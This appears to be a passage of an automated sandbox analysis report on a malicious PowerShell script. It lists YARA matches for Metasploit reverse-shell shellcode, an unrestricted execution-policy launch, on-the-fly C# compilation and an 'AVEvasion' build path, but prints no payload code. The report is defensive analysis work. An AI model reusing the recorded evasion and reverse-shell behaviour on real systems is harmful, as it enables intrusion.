    Source: Process Memory Space: powershell.exe PID: 3648, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_000001B129B101070_2_000001B129B10107
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AE598A80_2_00007FFB4AE598A8
    Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
    Source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
    Source: Process Memory Space: powershell.exe PID: 3648, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal100.troj.expl.evad.winPS1@6/12@0/1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fflvr5hx.4w4.ps1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: Execute.ps1Virustotal: Detection: 33%
    Source: Execute.ps1ReversingLabs: Detection: 13%
    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Execute.ps1"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES80CF.tmp" "c:\Users\user\AppData\Local\Temp\1ut2qrcn\CSCB06954D52E141279519B5296B9E4C4.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES80CF.tmp" "c:\Users\user\AppData\Local\Temp\1ut2qrcn\CSCB06954D52E141279519B5296B9E4C4.TMP"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.pdb source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.pdbhP source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\justs\source\repos\avevasion\AVEvasion\obj\Release\net48\AVEvasion.pdb source: powershell.exe, 00000000.00000002.2380893802.000001B129860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\justs\source\repos\avevasion\AVEvasion\obj\Release\net48\AVEvasion.pdbSHA256 source: powershell.exe, 00000000.00000002.2380893802.000001B129860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AE52B55 pushad ; iretd 0_2_00007FFB4AE52B69
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AE5845E push eax; ret 0_2_00007FFB4AE5846D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AE57C5E push eax; retf 0_2_00007FFB4AE57C6D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AE5842E pushad ; ret 0_2_00007FFB4AE5845D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AE57C2E pushad ; retf 0_2_00007FFB4AE57C5D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AE500BD pushad ; iretd 0_2_00007FFB4AE500C1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AE5785E push eax; iretd 0_2_00007FFB4AE5786D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFB4AE5782E pushad ; iretd 0_2_00007FFB4AE5785D
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
